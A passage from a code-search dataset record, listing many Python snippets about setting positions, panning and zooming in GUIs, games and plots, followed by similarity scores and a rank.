setPos(self,pos):\n self.Xpos,self.Ypos=pos", "def set_pos(self, x, y, orien):\n self.pos_x = x\n self.pos_y = y\n self.orientation = orien", "def update_zoom_plot(self):\n self.plot_zoom.setXRange(*self.linear_region.getRegion(), padding=0)", "def set_new_location(self, xPos, yPos):", "def set_position(self, x, y):\n self.position.x = x\n self.position.y = y\n self.rect.topleft = x, y", "def panZoom(*args, absolute: bool=True, downDistance: float=0.0, leftDistance: float=0.0,\n relative: bool=True, rightDistance: 
float=0.0, upDistance: float=0.0, zoomRatio:\n float=0.0, **kwargs)->None:\n pass", "def set_position(self, position):\n self.set_current_position(position)", "def set_position(self, x, y):\n self.tx = -x\n self.ty = -y", "def teleport(self, x, y):\n self.rect.x = x\n self.rect.y = y", "def setPosition(self):\n # determine posX, posY for battle\n (x1,y1) = globals.battlemapQuadrants[self.systemGrid]\n self.posX = x1+self.setX\n self.posY = y1+self.setY", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def setPosition(*args):", "def set_position(self, new_pos):\n self._position = new_pos", "def plot_se_pan_positions(self):\n plt.figure(figsize=(10,10))\n plt.plot(self.pan['RAJ2000'],self.pan['DEJ2000'],'bo',markersize=10,mfc='None',label='PanSTARRS')\n \n plt.plot(self.secat['ALPHA_J2000'],self.secat['DELTA_J2000'],'r.',label='SE')\n plt.legend()\n plt.gca().invert_xaxis()\n #print(f\"number of matched sources = {np.sum(zp.matchflag)}\")\n\n # add circle\n\n circle1 = plt.Circle((self.centerRA, self.centerDEC), self.radius, color='c',alpha=.2)\n plt.gca().add_patch(circle1)\n\n plt.savefig('plots/'+self.plotprefix.replace('.fits','')+'se-pan-positions.png')", "def set_view(self, s):\n #s.scene.reset_zoom()\n s.scene.z_plus_view()\n c = s.scene.camera\n c.azimuth(30)\n c.elevation(30)\n s.render()", "def SetPoint(self, pt):\r\n \r\n self._pointDrag = pt", "def setCoordsToMainFromPivot(self):\n\t\tself.grp.a.t.v = self.piv.translate\n\t\tself.grp.a.r.v = self.piv.rotation[0]", "def reset_position(self):\n self.rect.left, self.rect.top = self.start_pos", "def change_pos(self, direction):\n if direction == Direction.UP:\n self._y_pos -= 1\n elif direction == Direction.DOWN:\n self._y_pos += 1\n elif direction == Direction.LEFT:\n self._x_pos -= 1\n elif direction == Direction.RIGHT:\n self._x_pos += 1\n self._coordinates = self.coordinates()", "def set_position(self, position):\n self.position = position", "def set_view(self, s):\n #s.scene.reset_zoom()\n s.scene.z_plus_view()\n c = s.scene.camera\n c.azimuth(-30)\n c.elevation(20)\n s.render()", "def teleport(self, x, y, reset_rotation=False):\n self.center[0] = x\n self.center[1] = y\n self.rect.center = tuple(self.center) # update pygame sprite placement\n if reset_rotation:\n self.rotate(-self.rotation)", "def set_position(self, x, y):\n self.geometry('%s%s' % (x, y))", "def RepositionPane(self, pane, wnd_pos, wnd_size):\r\n\r\n pane_pos = pane.floating_pos\r\n pane_size = pane.floating_size\r\n\r\n snap = pane.snapped\r\n if snap == wx.LEFT:\r\n floating_pos = wx.Point(wnd_pos.x - pane_size.x, pane_pos.y)\r\n elif snap == wx.TOP:\r\n floating_pos = wx.Point(pane_pos.x, wnd_pos.y - pane_size.y)\r\n elif snap == wx.RIGHT:\r\n floating_pos = wx.Point(wnd_pos.x + wnd_size.x, pane_pos.y)\r\n elif snap == wx.BOTTOM:\r\n floating_pos = wx.Point(pane_pos.x, wnd_pos.y + wnd_size.y)\r\n\r\n if snap:\r\n if pane_pos != floating_pos:\r\n pane.floating_pos = floating_pos\r\n self._from_move = True\r\n pane.frame.SetPosition(pane.floating_pos)\r\n self._from_move = False", "def set_location(self, x, y):\n self.scene.set_location(x, y)\n self.redraw()", "def on_mouse_move(self, event):\n self.mouse = [event.xdata, event.ydata]\n\n # Update pan view on mouse move\n if self.panning is True:\n for a in self.pan_axes:\n a.drag_pan(1, 
event.key, event.x, event.y)\n\n # Async re-draw (redraws only on thread idle state, uses timer on backend)\n self.canvas.draw_idle()\n\n ##### Temporary place-holder for cached update #####\n self.update_screen_request.emit([0, 0, 0, 0, 0])", "def setzePosition(self, x, y):\n self.zielX = x\n self.zielY = y", "def __move_to(self, event):\n self.canvas_image.scan_dragto(event.x, event.y, gain=1)\n self.to_coord = (event.x, event.y)\n self.__show_image() # zoom tile and show it on the canvas", "def set_position(self, az_pos, el_pos):\n raise NotImplementedError()", "def setPosition(self,newPos):\n self._position = newPos", "def update():\n global dragon, x, y, position, angle_left, angle_right, size, new\n x, y, position, angle_left, angle_right, new = modify_pos(x, y, position,\n angle_left,\n angle_right,\n size, new)\n dragon.setData(x, y) # update plot", "def hack_position(self, instance, value):\n if dp(1) > 1: # Detect a Retina Mac\n self.slider.center_x = self.center_x -18", "def set_position(self, position):\r\n\r\n self.position = position\r\n if (self.rect):\r\n self.rect.x = position[0]\r\n self.rect.y = position[1]", "def _on_move(self, event):\n\n if not self.button_pressed:\n return\n\n if self.M is None:\n return\n\n x, y = event.xdata, event.ydata\n # In case the mouse is out of bounds.\n if x == None:\n return\n\n dx, dy = x - self.sx, y - self.sy\n x0, x1 = self.get_xlim()\n y0, y1 = self.get_ylim()\n w = (x1-x0)\n h = (y1-y0)\n self.sx, self.sy = x, y\n\n # Rotation\n if self.button_pressed in self._rotate_btn:\n # rotate viewing point\n # get the x and y pixel coords\n if dx == 0 and dy == 0:\n return\n self.elev = art3d.norm_angle(self.elev - (dy/h)*180)\n self.azim = art3d.norm_angle(self.azim - (dx/w)*180)\n self.get_proj()\n self.figure.canvas.draw()\n\n# elif self.button_pressed == 2:\n # pan view\n # project xv,yv,zv -> xw,yw,zw\n # pan\n# pass\n\n # Zoom\n elif self.button_pressed in self._zoom_btn:\n # zoom view\n # hmmm..this needs some help from clipping....\n minx, maxx, miny, maxy, minz, maxz = self.get_w_lims()\n df = 1-((h - dy)/h)\n dx = (maxx-minx)*df\n dy = (maxy-miny)*df\n dz = (maxz-minz)*df\n self.set_xlim3d(minx - dx, maxx + dx)\n self.set_ylim3d(miny - dy, maxy + dy)\n self.set_zlim3d(minz - dz, maxz + dz)\n self.get_proj()\n self.figure.canvas.draw()", "def set_place_frame_parameter(self):\n pos_x = self.ui.scrollArea.width()\n self.ui.frame_navigator.setGeometry(\n QtCore.QRect(pos_x - 180, 10, 160, 290))\n self.ui.frame_panorama.setGeometry(\n QtCore.QRect(pos_x - 220, 10, 210, 80))", "def set_position(self, position):\n raise NotImplementedError()", "def updatePosition(self, scene):\n\n pos = scene.posFromLonLat(self._lon, self._lat)\n self.setPos(pos)\n if self._min_zoom is not None:\n self.setVisible(scene._zoom >= self._min_zoom)", "def pan_sequence_number(self, pan_sequence_number):\n\n self._pan_sequence_number = pan_sequence_number", "def move(self, pos):\n self.widget.move(*pos)", "def set_pub_robot_pose(self, x, y, yaw):\r\n self.publisher_robot.set_pose_by_center(x, y, yaw)", "def set_position(self, point, reset=False, render=True):\n if isinstance(point, np.ndarray):\n if point.ndim != 1:\n point = point.ravel()\n self.camera.position = scale_point(self.camera, point, invert=False)\n if reset:\n self.reset_camera(render=render)\n self.camera_set = True\n self.Modified()", "def move(self):\n self.center_x += self._vx\n self.center_y += self._vy", "def move(self):\n \n self.position = self.explore()", "def setCenter(self, p):\n 
self.__center = p", "def position(self, position):\n self.move_to(position)", "def setCamera(self, viewX=0, viewY=0):\n self.viewX = viewX\n self.viewY = viewY", "def pos_image(image, x,y):\n image.anchor_x = x\n image.anchor_y = y", "def adjust_mario_position(self):\n self.last_x_position = self.mario.rect.right\n self.mario.rect.x += round(self.mario.x_vel)\n self.check_mario_x_collisions()\n\n if self.mario.in_transition_state == False:\n self.mario.rect.y += round(self.mario.y_vel)\n self.check_mario_y_collisions()", "def drag(self,x,y):\n self.x=x\n self.y=y", "def SetDockPos(self, source):\r\n \r\n self.dock_direction = source.dock_direction\r\n self.dock_layer = source.dock_layer\r\n self.dock_row = source.dock_row\r\n self.dock_pos = source.dock_pos\r\n self.dock_proportion = source.dock_proportion\r\n self.floating_pos = wx.Point(*source.floating_pos)\r\n self.floating_size = wx.Size(*source.floating_size)\r\n self.rect = wx.Rect(*source.rect)\r\n \r\n return self", "def move(self, offset):\n self._transform(\n [\n [1, 0, 0],\n [0, 1, 0],\n [0, 0, 1],\n ], center=None, offset=list(offset))", "def switch_origin(self):\n self.origin = 'bottom' if self.origin == 'top' else 'top'", "def reset_position(self): \n self.rect.x = 400\n self.rect.y = 400\n \n # Specifies the Player's spawnpoint as maze_arrangement[8][8], representing\n # the tile in the center of the maze \n self.__minotaur_x = 8\n self.__minotaur_y = 8", "def setAxisPagePosition(x,y):\n dislin.axspos(x,y)" ]
[ "0.7055883", "0.7055883", "0.69751316", "0.66623855", "0.65398514", "0.6447946", "0.6447465", "0.64395374", "0.6402126", "0.63889927", "0.63513035", "0.63486654", "0.63106734", "0.6296175", "0.6237631", "0.62298304", "0.62075496", "0.6197965", "0.61601925", "0.61556464", "0.61436063", "0.61419624", "0.61272776", "0.61109114", "0.6109658", "0.6097748", "0.6088771", "0.6075214", "0.60668606", "0.60615", "0.6034026", "0.6030149", "0.6018918", "0.6003176", "0.59879667", "0.5971258", "0.59551525", "0.5947885", "0.59392583", "0.5937792", "0.5934036", "0.59132606", "0.5887031", "0.5868367", "0.5860671", "0.5841896", "0.58369875", "0.58353436", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5833212", "0.5831068", "0.58257824", "0.5820576", "0.58129025", "0.58100474", "0.58088315", "0.5804052", "0.579886", "0.5794948", "0.5793313", "0.5785398", "0.57631683", "0.57625026", "0.57602644", "0.5758778", "0.57391346", "0.5735134", "0.57348746", "0.57278603", "0.5721971", "0.5721169", "0.5720374", "0.57192475", "0.5718916", "0.5707418", "0.5706756", "0.57033587", "0.5695764", "0.56953156", "0.56847715", "0.5681354", "0.56761307", "0.5673489", "0.5672623", "0.56705725", "0.5659352", "0.5658152", "0.56396186", "0.5636861", "0.5632796", "0.5624474", "0.5620714" ]
0.0
-1
Decorator to be used in api methods to serve the swagger documentation for this api.
def api_documentation(api: str, summary: str, in_model: BaseModel, out_model: BaseModel, out_description: str) -> Callable: for model, name in ((in_model, 'Input'), (out_model, 'Output')): doc.Object( make_dataclass( f'Api{api[1:].title()}{name}', [(key, val.type_, val.type_) for key, val in model.__dict__['__fields__'].items()])) im_returns = doc.JsonBody({ key: val.type_ for key, val in in_model.__dict__['__fields__'].items() }) om_returns = { key: val.type_ for key, val in out_model.__dict__['__fields__'].items() } def decorator(func): @doc.summary(summary) @doc.response(412, 'Error: Precondition Failed', description='The passed request-parameters are invalid') @doc.response(500, 'Error: Server-Error occured', description='An internal error occured') @doc.consumes(im_returns, content_type='application/json', location='body') @doc.produces(om_returns, content_type='application/json', description=out_description) @wraps(func) async def function_wrapper(request, *args, **kwargs): return await func(request=request, *args, **kwargs) return function_wrapper return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def index():\n definition = {\n \"swagger\": \"2.0\",\n \"info\": {\n \"title\": flask.current_app.config.get(\"APPNAME\", \"Not specified\"),\n \"version\": flask.current_app.config.get(\"VERSION\", \"Not specified\"),\n },\n \"host\": request.host,\n \"schemes\": [\"http\"],\n \"consumes\": [\"application/json\"],\n \"produces\": [\"application/json\"],\n \"definitions\": registry._definitions,\n \"paths\": {}\n }\n\n rules = list(flask.current_app.url_map.iter_rules())\n for r in sorted(rules, key=operator.attrgetter('rule')):\n if r.rule.startswith('/static'):\n continue\n if r.endpoint in registry._skipped:\n continue\n\n rule = re.sub(r\"<(?:[_a-zA-Z0-9\\(\\)]+:)?([a-zA-Z0-9_]+)>\", r\"{\\1}\", r.rule)\n if rule not in definition['paths']:\n definition['paths'][rule] = {}\n\n methods_handled = r.methods & REST_METHODS\n handler = flask.current_app.view_functions.get(r.endpoint)\n doc = handler.func_doc\n\n if len(methods_handled) == 1:\n method = methods_handled.pop().lower()\n try:\n validated = yaml.safe_load(doc)\n if not isinstance(validated, dict):\n raise Exception(\"Not a descriptor\")\n definition['paths'][rule][method] = validated\n except Exception:\n pass\n\n else:\n # We need to handle multi-method docstrings differently\n # because the documentation needs to define both, and\n # it's a higher level of the swagger hierarchy\n try:\n validated = yaml.safe_load(doc)\n if not isinstance(validated, dict):\n raise Exception(\"Not a descriptor\")\n definition['paths'][rule].update(validated)\n except Exception:\n definition['paths'][rule] = {}\n\n resp = flask.make_response(\n json.dumps(definition, for_json=True))\n resp.headers.set(\"Content-type\", 'application/json')\n resp.headers.set(\"Access-Control-Allow-Origin\", \"*\")\n return resp", "def apiDocs():\n\treturn render_template('apiDocs.html')", "def swagger_redirect(request: HttpRequest) -> HttpResponse:\n return HttpResponse('Use /api/v2/docs/ instead', status=410)", "def swagger():\n return jsonify(current_app.spec.to_dict())", "def describe(self, *args, **kwargs):\n def _autodoc(func, *_args, **_kwargs):\n if len(_args) > 0:\n #: Instance or class method.\n response = func(_args[0])\n else:\n #: Function.\n if len(_kwargs) > 0:\n response = func(**_kwargs)\n else:\n response = func()\n\n self.parse(args[0], response)\n\n return func\n\n return decorator(_autodoc)", "def get_documentation(self, *args, **dargs):\n pass", "def swagger_definition(self, base_path=None, **kwargs):\n return Swagger(\n {\n \"info\": Info(\n {\n key: kwargs.get(key, self.DEFAULT_INFO.get(key))\n for key in Info.fields.keys()\n if key in kwargs or key in self.DEFAULT_INFO\n }\n ),\n \"paths\": self.paths,\n \"swagger\": \"2.0\",\n \"basePath\": base_path,\n }\n ).to_primitive()", "def documentation_only():\n pass", "def DeveloperAPI(*args, **kwargs):\n if len(args) == 1 and len(kwargs) == 0 and callable(args[0]):\n return DeveloperAPI()(args[0])\n\n def wrap(obj):\n _append_doc(obj, message='DeveloperAPI: This API may change across minor Ludwig releases.')\n _mark_annotated(obj)\n return obj\n return wrap", "async def handle_doc(self, request: web.Request) -> web.Response:\n spec = request.app[\"spec\"]\n spec_url = request.app.router[\"openapi_spec\"].url_for()\n title = spec.info.title\n html = f\"\"\"\n <!DOCTYPE html>\n <html>\n <head>\n <title>{title}</title>\n <!-- needed for adaptive design -->\n <meta charset=\"utf-8\"/>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n \"\"\"\n if self.font:\n html += 
f\"\"\"\n <link href=\"https://fonts.googleapis.com/css?{self.font}\" rel=\"stylesheet\">\n \"\"\"\n html += f\"\"\"\n <link rel=\"shortcut icon\" href=\"{self.favicon_url}\">\n <!--\n ReDoc doesn't change outer page styles\n -->\n <style>\n body {{\n margin: 0;\n padding: 0;\n }}\n </style>\n </head>\n <body>\n <redoc spec-url=\"{spec_url}\"></redoc>\n <script src=\"{self.redoc_js_url}\"> </script>\n </body>\n </html>\n \"\"\"\n return web.Response(text=html, content_type=\"text/html\")", "def api():\n return send_file('templates/bootstrapper.swagger.json')", "def main():\n\n return redirect('/apidocs')", "def generate_documentation(self):\n self.generate_api_docs()\n build.main([\n self.SOURCE_DIR,\n self.BUILD_DIR,\n ])", "def overview():\n return render_template('api/api.html', title='API Overview')", "def api_index():\n func_list = {}\n for rule in app.url_map.iter_rules():\n if rule.endpoint != 'static':\n func_list[rule.rule] = app.view_functions[rule.endpoint].__doc__\n return jsonify(func_list)", "def documentation():\n return render_template('help.html')", "def get_swagger_view(title=None, url=None, patterns=None, urlconf=None):\n class SwaggerSchemaView(APIView):\n _ignore_model_permissions = True\n exclude_from_schema = True\n permission_classes = [AllowAny]\n renderer_classes = [\n CoreJSONRenderer,\n renderers.OpenAPIRenderer,\n renderers.SwaggerUIRenderer\n ]\n\n def get(self, request):\n generator = CustomSchemaGenerator(\n title=title,\n url=url,\n patterns=patterns,\n urlconf=urlconf\n )\n schema = generator.get_schema(request=request, public=True)\n\n if not schema:\n raise exceptions.ValidationError(\n 'The schema generator did not return a schema Document'\n )\n\n return Response(schema)\n\n return SwaggerSchemaView.as_view()", "def test_swagger(self):\n response = self.client.get(\"/api/v1/swagger\", query_string=dict(validate_schema=True))\n assert_that(response.status_code, is_(equal_to(200)))\n swagger = loads(response.get_data().decode(\"utf-8\"))\n # we have the swagger docs endpoint too, which is implemented as a query.\n # ignore it here for now.\n del swagger[\"paths\"][\"/swagger/docs\"]\n assert_that(swagger[\"paths\"], is_(equal_to({\n \"/foo/get\": {\n \"get\": {\n \"description\": \"My doc string\",\n \"tags\": [\"foo\"],\n \"responses\": {\n \"default\": {\n \"description\": \"An error occurred\", \"schema\": {\n \"$ref\": \"#/definitions/Error\",\n }\n },\n \"200\": {\n \"description\": \"My doc string\",\n \"schema\": {\n \"$ref\": \"#/definitions/QueryResult\",\n }\n }\n },\n \"parameters\": [\n {\n \"in\": \"header\",\n \"name\": \"X-Response-Skip-Null\",\n \"required\": False,\n \"type\": \"string\",\n \"description\": \"Remove fields with null values from the response.\"\n },\n {\n \"required\": False,\n \"type\": \"string\",\n \"name\": \"optional_value\",\n \"in\": \"query\",\n },\n {\n \"required\": True,\n \"type\": \"string\",\n \"name\": \"required_value\",\n \"in\": \"query\",\n },\n ],\n \"operationId\": \"query\",\n }\n }\n })))", "def api(self) -> str:", "def __init_subclass__(cls, **kwargs):\n super().__init_subclass__(**kwargs)\n\n if not __name__ == cls.__module__:\n # e.g.: cls.__module__ = mpcontribs.api.projects.views\n views_path = cls.__module__.split(\".\")\n doc_path = \".\".join(views_path[:-1] + [\"document\"])\n cls.tags = [views_path[-2]]\n doc_filepath = doc_path.replace(\".\", os.sep) + \".py\"\n if os.path.exists(doc_filepath):\n cls.doc_name = cls.tags[0].capitalize()\n Model = getattr(import_module(doc_path), 
cls.doc_name)\n cls.schema_name = cls.doc_name + \"Schema\"\n cls.Schema = type(\n cls.schema_name,\n (ModelSchema, object),\n {\n \"Meta\": type(\n \"Meta\",\n (object,),\n dict(model=Model, ordered=True, model_build_obj=False),\n )\n },\n )\n cls.definitions = {cls.schema_name: schema2jsonschema(cls.Schema)}\n cls.resource.schema = cls.Schema\n\n # write flask-mongorest swagger specs\n for method in cls.methods:\n spec = get_specs(cls, method, cls.tags[0])\n if spec:\n dir_path = os.path.join(DOC_DIR, cls.tags[0])\n file_path = os.path.join(dir_path, method.__name__ + \".yml\")\n if not os.path.exists(file_path):\n os.makedirs(dir_path, exist_ok=True)\n\n if is_gunicorn:\n with open(file_path, \"w\") as f:\n yaml.dump(spec, f)\n logger.debug(\n f\"{cls.tags[0]}.{method.__name__} written to {file_path}\"\n )", "def use_in_api_documentation(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"use_in_api_documentation\")", "def documentation():\n return auto.html()", "def get_swagger_view(title=None, url=None, patterns=None, urlconf=None):\n class SwaggerSchemaView(APIView):\n _ignore_model_permissions = True\n exclude_from_schema = True\n permission_classes = [AllowAny]\n renderer_classes = [\n CoreJSONRenderer,\n renderers.OpenAPIRenderer,\n renderers.SwaggerUIRenderer\n ]\n\n def get(self, request):\n generator = SchemaGenerator(\n title=title,\n url=url,\n patterns=patterns,\n urlconf=urlconf\n )\n schema = generator.get_schema(request=request)\n\n if not schema:\n raise exceptions.ValidationError(\n 'The schema generator did not return a schema Document'\n )\n\n return Response(schema)\n\n return SwaggerSchemaView.as_view()", "def __call__(self, func):\n func.__doc__ = self.doc\n return func", "def wrapper(*args, **kwargs):\n print(f\"you are about to call {fn.__name__}\")\n print(f\"Here's the documentation: {fn.__doc__}\")\n return fn(*args, **kwargs)", "def _rapidoc(request: HttpRequest) -> HttpResponse:\n return render(request, 'rapidoc.html', {\n 'schema': reverse('api:v2:schema'),\n })", "def make_doc():\n doc_app = Flask(__name__)\n doc_app.register_blueprint(blueprint(no_doc=False))\n return doc_app", "def view(self, **options: Any) -> Callable:\n\n def decorator(f):\n rule = \"/\"\n endpoint = options.pop(\"endpoint\", f.__name__)\n self.add_url_rule(rule, endpoint, f, **options)\n return f\n\n return decorator", "def generate_apidoc_patches(self):\n base_path = self.paths[\"api_doc_dir\"]\n from django_swagger_utils.core.utils.mk_dirs import MkDirs\n MkDirs().mk_dir_if_not_exits(file_name=base_path + \"/\")\n\n from django_swagger_utils.apidoc_gen.generators.patch_generator import PatchGenerator\n\n patch_generator = PatchGenerator(self.app_name, self.parser, self.paths, base_path)\n # generating api docs\n patch_generator.generate_json_patch()", "def get_documentation():\n return send_file(base_dir / \"static/documentation.html\", \"text/html; charset=UTF-8\")", "def doc_apply(doc):\n\n def wrapper(func):\n func.__doc__ = doc\n return func\n\n return wrapper", "def show_documentation(self):\n self.docs = documentation.Documentation()", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def _add_doc(func, doc):\r\n func.__doc__ = doc", "def use_in_api_documentation(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_in_api_documentation\")", "def __init__(self, loop=None, config=None):\n\n self.logger = logging.getLogger(self.__class__.__name__)\n self.loop = loop if loop is not None else 
asyncio.get_event_loop()\n self.config = config\n\n swagger_url = self.prefix_context_path(\"/doc\")\n\n self.app = aiohttp.web.Application(loop=loop, middlewares=[functools.partial(api_middlewares.rest_error_middleware, logger=self.logger)])\n self.app.factory = self\n\n self.app.router.add_route(\"GET\", \"/\", lambda x: aiohttp.web.HTTPFound(swagger_url))\n if self.config.context_path != \"/\":\n self.app.router.add_route(\"GET\", self.config.context_path, lambda x: aiohttp.web.HTTPFound(swagger_url))\n self.app.router.add_route(\"GET\", self.config.context_path + \"/\", lambda x: aiohttp.web.HTTPFound(swagger_url))\n self.app.router.add_route(\n \"GET\",\n self.prefix_context_path(\"/appointments/{user_type}/{control_type}/{vehicle_type}/{organism}/{site}/{start_date}/{end_date}\"),\n resources.RestAppointments().get,\n )\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/sites\"), resources.RestSites().get)\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/vehicles\"), resources.RestVehicles().get)\n self.app.router.add_route(\"GET\", self.prefix_context_path(\"/appointments/ws\"), resources.WsAppointments().get)\n\n # Setup Swagger\n # bundle_params and schemes are a GitHub patch not released\n # in any aiohttp_swagger package\n setup_swagger_sign = inspect.signature(aiohttp_swagger.setup_swagger)\n kwargs = {}\n if \"bundle_params\" in setup_swagger_sign.parameters:\n kwargs[\"bundle_params\"] = {\"layout\": \"BaseLayout\", \"defaultModelExpandDepth\": 5}\n if \"schemes\" in setup_swagger_sign.parameters:\n kwargs[\"schemes\"] = self.config.swagger_ui_schemes\n\n aiohttp_swagger.setup_swagger(\n app=self.app,\n description=\"API for finding appointments timeslots for SNCT vehicule inspection\",\n title=\"SNCT Appointments API\",\n api_version=\"1.0\",\n contact=\"acecile@letz-it.lu\",\n swagger_url=swagger_url,\n **kwargs\n )\n\n # Setup CORS\n if self.config.allow_origin:\n self.cors = aiohttp_cors.setup(\n self.app,\n defaults={self.config.allow_origin: aiohttp_cors.ResourceOptions(allow_credentials=True, expose_headers=\"*\", allow_headers=\"*\")},\n )\n for route in self.app.router.routes():\n if not isinstance(route.resource, aiohttp.web_urldispatcher.StaticResource):\n self.cors.add(route)\n\n # Print configured routes\n self.print_routes()\n\n # Setup services\n self.app.on_startup.append(self.setup_appointment_dispatcher)\n self.app.on_startup.append(self.setup_snct_appointment_scrapper)\n self.app.on_shutdown.append(self.close_snct_appointment_scrapper)\n self.app.on_startup.append(self.setup_ws_stream_coros)\n self.app.on_shutdown.append(self.close_ws_stream_coros)", "def _add_doc(func, doc):\n func.__doc__ = doc", "def route(cls, url, method='GET'):\n def route_decorator(func):\n item = (url, method, func)\n cls._docoratedRouteHandlers.append(item)\n return func\n return route_decorator", "def init_app(app):\n\n def register(path, resource):\n app.add_url_rule(path, view_func=resource.as_view(resource.__name__))\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n docs.register(resource, endpoint=resource.__name__)\n\n docs = FlaskApiSpec(app)\n register(\"/organisms\", Organisms)\n register(\"/organisms/<int:id>\", Organism)\n register(\"/strains\", Strains)\n register(\"/strains/<int:id>\", Strain)\n register(\"/experiments\", Experiments)\n register(\"/experiments/<int:id>\", Experiment)\n register(\"/experiments/<int:id>/data\", ExperimentData)\n register(\"/media\", Media)\n register(\"/media/<int:id>\", Medium)\n 
register(\"/media/compounds\", MediumCompounds)\n register(\"/media/compounds/<int:id>\", MediumCompound)\n register(\"/conditions\", Conditions)\n register(\"/conditions/<int:id>\", Condition)\n register(\"/conditions/<int:id>/data\", ConditionData)\n register(\"/samples\", Samples)\n register(\"/samples/<int:id>\", Sample)\n register(\"/fluxomics\", Fluxomics)\n register(\"/fluxomics/batch\", FluxomicsBatch)\n register(\"/fluxomics/<int:id>\", Fluxomic)\n register(\"/metabolomics\", Metabolomics)\n register(\"/metabolomics/batch\", MetabolomicsBatch)\n register(\"/metabolomics/<int:id>\", Metabolomic)\n register(\"/proteomics\", Proteomics)\n register(\"/proteomics/batch\", ProteomicsBatch)\n register(\"/proteomics/<int:id>\", Proteomic)\n register(\"/uptake-secretion-rates\", UptakeSecretionRates)\n register(\"/uptake-secretion-rates/<int:id>\", UptakeSecretionRate)\n register(\"/molar-yields\", MolarYields)\n register(\"/molar-yields/<int:id>\", MolarYield)\n register(\"/growth-rates\", GrowthRates)\n register(\"/growth-rates/<int:id>\", GrowthRate)", "def api_html():\n\n return jsonify({'version': __version__})", "def wrapper(func):\n docstring = func.__doc__\n helpdict = parse_docstring(\n docstring, key_symbol=key_symbol,\n description_symbol=description_symbol)\n func.helpdict = helpdict\n # remove markers\n docstring = docstring.replace(key_symbol, '')\n func.__doc__ = docstring.replace(description_symbol, '')\n return func", "def generate_api_docs(self):\n if self.API_OUTPUT_DIR:\n args = [\n # Put documentation for each module on its own page\n '-e',\n # don't create the \"modules.rst\" file (the table of contents\n # file) as this is already provided by the package's main rst\n # file.\n '-T',\n # Overwrite existing files\n '--force',\n '-o', self.API_OUTPUT_DIR,\n # the package to generate docs from\n self.PROJECT_DIR\n ]\n excludes = [\n os.path.join(self.PROJECT_DIR, p)\n if not os.path.isabs(p) else p\n for p in self.API_EXCLUDE_DIRS\n ]\n apidoc.main(args + excludes)", "def addRouteDocs(resource, route, method, info, handler):\n # Convert wildcard tokens from :foo form to {foo} form.\n convRoute = []\n for token in route:\n if token[0] == ':':\n convRoute.append('{{{}}}'.format(token[1:]))\n else:\n convRoute.append(token)\n\n path = '/'.join(['', resource] + convRoute)\n\n info = info.copy()\n info['httpMethod'] = method.upper()\n\n if not 'nickname' in info:\n info['nickname'] = handler.__name__\n\n # Add the operation to the given route\n if not path in routes[resource]:\n routes[resource][path] = []\n\n routes[resource][path].append(info)\n discovery.add(resource)", "def generate_patch_build(self, domain):\n # TODO change name of def\n base_path = self.paths[\"api_doc_dir\"]\n self.generate_apidoc_patches()\n from django_swagger_utils.apidoc_gen.generators.patch_generator import PatchGenerator\n patch_generator = PatchGenerator(self.app_name, self.parser, self.paths, base_path)\n patch_generator.filter_for_deleted_apis()\n\n process = subprocess.Popen(['which', 'apidoc'], stdout=subprocess.PIPE)\n\n output = process.communicate()[0]\n if output:\n\n with open(self.paths[\"base_dir\"] + \"/apidoc.json\", 'w') as outfile:\n apidoc_content = {\"url\": \"https://ib-backend-dev.apigateway.in\",\n \"version\": \"0.0.1\",\n \"description\": \"\",\n \"name\": \"iBHubs_backend API Documentation\",\n \"title\": \"iBHubs_backend Documenation\"}\n json.dump(apidoc_content, outfile, indent=4)\n # by default we assume user is working at no specific branch so we fix\n # url to 
default above url as above , then we check if any specific parametr is given\n # and replace url with required url\n if domain != '' and domain:\n with open(self.paths[\"apidoc\"]) as src_json:\n apidoc_content = json.load(src_json)\n apidoc_content['url'] = \"https://\" + domain\n with open(self.paths[\"apidoc\"], 'w') as outfile:\n json.dump(apidoc_content, outfile, indent=4)\n try:\n os.mkdir(\"docs\")\n except OSError:\n pass\n # the below command is responsible for creating docs\n process = subprocess.Popen(['apidoc', '-i', self.base_dir,\n '-o', os.path.join(self.base_dir, 'docs'),\n '-e', 'django_swagger_utils/*',\n '-e', 'static/*',\n ], stdout=subprocess.PIPE)\n print process.communicate()[0]\n ################################################\n # hosting apidoc\n ################################################\n # obtaining the path of static folder of django-swagger-utils\n # django_swagger_utils_path = os.path.abspath(os.path.join(os.path.dirname(__file__), \"../..\"))\n # static_folder_path = os.path.join(django_swagger_utils_path, \"static\")\n # import shutil\n # # create a folder apidoc , delete if previously exists\n # if os.path.exists(os.path.join(static_folder_path, \"apidoc\")):\n # shutil.rmtree(os.path.join(static_folder_path, \"apidoc\"))\n # apidoc_path = os.path.join(static_folder_path, \"apidoc\")\n #\n # os.mkdir(apidoc_path)\n\n # from distutils.dir_util import copy_tree\n # copydocs from docs to apidoc in swagger utils\n # try:\n # copy_tree(os.path.join(self.base_dir, 'docs'), apidoc_path)\n # except Exception as err:\n # print err\n\n # browse to localhost:<port>/static/apidoc/index.html\n\n else:\n raise CommandError(\"Help: Install apidoc: [ sudo npm install -g apidoc ]\")", "def click_doc(arg):\n import inspect\n\n def decorator(function):\n if type(arg) is str:\n function.__doc__ = arg\n elif inspect.isclass(arg):\n function.__doc__ = arg.__doc__\n else:\n function.__doc__ = None\n return function\n\n return decorator", "def subaction(*args, **kwargs):\n operation_description = kwargs.pop('description', None)\n response_code = kwargs.pop('response_code', None)\n response_serializer = kwargs.pop(\n 'response_serializer', kwargs.get('serializer_class', None)\n )\n assert (\n (response_code is None) or\n (response_code is not None and response_serializer is not None)\n ), \"If `response_code` was setted, `response_serializer` should be setted too.\"\n\n def decorator(func: _t.Callable):\n func_object = action(*args, **kwargs)(func)\n override_kw = 